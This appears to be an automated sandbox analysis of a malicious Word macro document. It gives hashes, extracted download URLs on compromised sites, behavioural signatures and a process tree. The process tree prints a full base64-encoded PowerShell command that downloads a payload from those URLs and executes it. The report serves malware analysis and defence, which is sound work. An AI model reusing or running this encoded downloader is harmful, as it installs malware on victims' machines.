Analysis
-
max time kernel
117s -
max time network
117s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 06:32
Behavioral task
behavioral1
Sample
ed0571d760d427364e36778626a10456_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ed0571d760d427364e36778626a10456_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
ed0571d760d427364e36778626a10456_JaffaCakes118.doc
-
Size
169KB
-
MD5
ed0571d760d427364e36778626a10456
-
SHA1
084a9f60cb71b5b36b8a8ffba732aed9e9fc6df3
-
SHA256
ee6e5cb609d013597e0e25c99a83f154cba198f5979d358fadb0d532eb0c2c26
-
SHA512
522f2334ed3215bb11fff70d5a1452bd60ee04b90b61edc5dc49fcc682bac695f078a12dc564045ec947eeb46402a8d7da520d2dfd02ca4c8218746d29cb3bd7
-
SSDEEP
1536:vGGGGGGGGGG2xJLEt+LaaGGGGGGGGGGjLo9xiP+rIiZo7dLeqH74OC+pO4am35Hc:trfrzOH98ipgolq+i
Malware Config
Extracted
http://theccwork.com/mail.theccwork.com/IJp/
https://www.retirementprofessional.com/wp-admin/tjQ/
https://writingfromling.live/wp-admin/GL/
http://shahqutubuddin.org/ix/
https://jumpstart.store/wp-admin/q/
https://aidenshirt.com/wp-admin/e6f/
https://edenrug.store/wp-admin/H/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2580 2604 powershell.exe 30 -
Blocklisted process makes network request 6 IoCs
flow pid Process 5 2580 powershell.exe 6 2580 powershell.exe 10 2580 powershell.exe 11 2580 powershell.exe 14 2580 powershell.exe 15 2580 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E53D3863-FE41-4D48-B739-08AF38D9FB12}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}\ = "MdcOptionButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E53D3863-FE41-4D48-B739-08AF38D9FB12} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLTextArea" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E53D3863-FE41-4D48-B739-08AF38D9FB12}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E53D3863-FE41-4D48-B739-08AF38D9FB12}\2.0\HELPDIR WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E53D3863-FE41-4D48-B739-08AF38D9FB12}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\TypeLib\{E53D3863-FE41-4D48-B739-08AF38D9FB12}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000_CLASSES\Wow6432Node\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2124 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2580 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2124 WINWORD.EXE 2124 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2124 wrote to memory of 620 2124 WINWORD.EXE 34 PID 2124 wrote to memory of 620 2124 WINWORD.EXE 34 PID 2124 wrote to memory of 620 2124 WINWORD.EXE 34 PID 2124 wrote to memory of 620 2124 WINWORD.EXE 34
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ed0571d760d427364e36778626a10456_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABUADMAaABmAHMAOAB5AD0AKAAoACcARwA2ACcAKwAnAHIAJwArACcAMQA0AG0AJwApACsAJwB3ACcAKQA7AC4AKAAnAG4AZQB3ACcAKwAnAC0AaQB0AGUAbQAnACkAIAAkAEUAbgBWADoAVQBzAEUAcgBwAHIATwBGAEkATABFAFwAbQAzAFkAZgBhADAAOQBcAGYARQBkAG0AUQBzAFUAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAAZABJAFIAZQBDAFQAbwBSAHkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBgAEMAYABVAGAAUgBpAFQAeQBwAHIATwBgAFQATwBjAG8AbAAiACAAPQAgACgAKAAnAHQAJwArACcAbABzADEAMgAnACkAKwAoACcALAAgACcAKwAnAHQAJwApACsAJwBsACcAKwAoACcAcwAnACsAJwAxADEAJwApACsAJwAsACAAJwArACgAJwB0ACcAKwAnAGwAcwAnACkAKQA7ACQAUgBjAG0AOABjAGIAegAgAD0AIAAoACgAJwBLACcAKwAnADIAbgAnACkAKwAnAGcAcQAnACsAKAAnADkAcgAnACsAJwBoACcAKQApADsAJABVAHoAZgBzADUAXwBnAD0AKAAoACcARgBmACcAKwAnAGwAJwApACsAJwA1ACcAKwAoACcAdABxACcAKwAnAHYAJwApACkAOwAkAEQAZwAzADgAawB2AGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAegAnACsAKAAnAG8ASgAnACsAJwBNADMAeQAnACkAKwAoACcAZgBhADAAOQAnACsAJwB6AG8AJwApACsAKAAnAEoAJwArACcARgBlAGQAbQBxAHMAdQAnACsAJwB6ACcAKQArACcAbwAnACsAJwBKACcAKQAuACIAcgBFAGAAcABgAEwAQQBDAEUAIgAoACgAWwBDAEgAYQBSAF0AMQAyADIAKwBbAEMASABhAFIAXQAxADEAMQArAFsAQwBIAGEAUgBdADcANAApACwAWwBzAHQAcgBpAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFIAYwBtADgAYwBiAHoAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAEcAOABmAHIAaQBoADgAPQAoACcATAAnACsAKAAnADkAMQAnACsAJwBlAG8AJwApACsAJwB5ADUAJwApADsAJABGADYAagBuAGwAagA0AD0AJgAoACcAbgAnACsAJwBlAHcALQBvAGIAagBlAGMAJwArACcAdAAnACkAIABOAGUAdAAuAHcARQBiAGMAbABJAEUATgB0ADsAJABBAG8AawBmADQAZgBpAD0AKAAnAGgAdAAnACsAJwB0ACcAKwAnAHAAJwArACgAJwA6ACcAKwAnAC8ALwB0AGgAJwArACcAZQAnACkAKwAnAGMAJwArACgAJwBjAHcAbwAnACsAJwByACcAKwAnAGsALgBjAG8AJwApACsAKAAnAG0ALwBtAGEAJwArACcAaQAnACkAKwAoACcAbAAnACsAJwAuAHQAaABlAGMAJwApACsAKAAnAGMAJwArACcAdwBvACcAKwAnAHIAawAuAGMAbwAnACkAKwAnAG0AJwArACgAJwAvAEkAJwArACcASgBwACcAKwAnAC8AKgBoAHQAdAAnACkAKwAnAHAAJwArACgAJwBzADoALwAvAHcAdwB3AC4AcgBlAHQAaQByAGUAbQBlACcAKwAnAG4AJwArACcAdABwACcAKwAnAHIAbwAnACsAJwBmAGUAcwAnACkAKwAoACcAcwBpAG8AJwArACcAbgAnACkAKwAoACcAYQBsACcAKwAnAC4AYwBvAG0ALwB3ACcAKwAnAHAALQBhAGQAbQBpAG4AJwArACcALwAnACsAJwB0AGoAUQAnACsAJwAvACoAaAB0ACcAKQArACcAdABwACcAKwAnAHMAOgAnACsAKAAnAC8AJwArACcALwB3AHIAaQAnACkAKwAoACcAdABpAG4AJwArACcAZwBmACcAKQArACgAJwByAG8AbQAnACsAJwBsAGkAJwApACsAKAAnAG4AJwArACcAZwAuACcAKQArACgAJwBsACcAKwAnAGkAdgAnACkAKwAoACcAZQAnACsAJwAvAHcAJwApACsAKAAnAHAALQAnACsAJwBhACcAKQArACgAJwBkAG0AJwArACcAaQAnACsAJwBuAC8ARwBMACcAKQArACcALwAnACsAKAAnACoAaAB0ACcAKwAnAHQAJwApACsAJwBwACcAKwAoACcAOgAvAC8AcwBoAGEAaABxAHUAdAB1AGIAdQAnACsAJwBkAGQAJwArACcAaQAnACsAJwBuACcAKQArACcALgAnACsAJwBvACcAKwAnAHIAJwArACgAJwBnACcAKwAnAC8AaQB4AC8AJwApACsAKAAnACoAaAB0ACcAKwAnAHQAcABzADoALwAnACsAJwAvAGoAdQAnACsAJwBtACcAKQArACgAJwBwAHMAdABhAHIAdAAuAHMAJwArACcAdAAnACkAKwAoACcAbwAnACsAJwByAGUALwAnACsAJwB3AHAALQBhAGQAJwApACsAKAAnAG0AaQAnACsAJwBuAC8AJwArACcAcQAvACoAaAAnACkAKwAnAHQAdAAnACsAKAAnAHAAJwArACcAcwA6AC8ALwAnACsAJwBhACcAKQArACgAJwBpAGQAZQAnACsAJwBuAHMAJwArACcAaABpACcAKQArACcAcgB0ACcAKwAoACcALgBjAG8AbQAnACsAJwAvACcAKwAnAHcAcAAnACkAKwAoACcALQBhACcAKwAnAGQAbQAnACsAJwBpAG4ALwBlADYAJwApACsAKAAnAGYALwAqAGgAdAAnACsAJwB0ACcAKwAnAHAAcwA6ACcAKQArACgAJwAvACcAKwAnAC8AZQBkACcAKwAnAGUAbgByACcAKQArACgAJwB1AGcALgAnACsAJwBzAHQAJwArACcAbwByAGUALwAnACkAKwAoACcAdwAnACsAJwBwACcAKwAnAC0AYQBkAG0AaQBuACcAKQArACgAJwAvACcAKwAnAEgALwAnACkAKQAuACIAcwBQAEwAYABpAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABBADgAMQBpAHQAOQBwAD0AKAAnAEkAJwArACgAJwBnAHYAaABrADUAJwArACcANwAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAFIAYwB5ADUAOQBlAGQAIABpAG4AIAAkAEEAbwBrAGYANABmAGkAKQB7AHQAcgB5AHsAJABGADYAagBuAGwAagA0AC4AIgBEAGAATwB3AE4ATABvAEEARABgAEYASQBgAGwAZQAiACgAJABSAGMAeQA1ADkAZQBkACwAIAAkAEQAZwAzADgAawB2AGYAKQA7ACQAVQBjAGcAYgBsADIAYQA9ACgAJwBVACcAKwAoACcAeABiACcAKwAnADcAawBiACcAKQArACcAZQAnACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQARABnADMAOABrAHYAZgApAC4AIgBsAGUAbgBnAGAAVABIACIAIAAtAGcAZQAgADMAMQAxADAAMQApACAAewAmACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtACcAKwAnAEkAdABlACcAKwAnAG0AJwApACgAJABEAGcAMwA4AGsAdgBmACkAOwAkAEEANQB3ADEAbQB1AG0APQAoACgAJwBIAGYAJwArACcAYgB4ADEAaQAnACkAKwAnAHgAJwApADsAYgByAGUAYQBrADsAJABMAG0AbABzADMAXwBrAD0AKAAnAEQAJwArACcAcQAnACsAKAAnADgANwB1ACcAKwAnAHcAawAnACkAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQA2AGsAYQBqAHUAcQA9ACgAJwBXAHYAJwArACgAJwBiAHYAJwArACcAXwAnACkAKwAnADAAYwAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5616328d23922fc314cd5c140539d4840
SHA14a2c102d3577400429c426bad5fd8abe5dfdc6e8
SHA256d4916b5517519857c65ddc9fe5d0e47dc016fbc6caa1ead34eb4c50071f876a1
SHA512d20419fedf6d856c2a8dd4f2821d3dfeeb26764040be3c070be91e26d8a6fea196875c88a8f3867a22f86f7df9b3a3454bd0118431fe00a22fa8c7a77a3ec2c1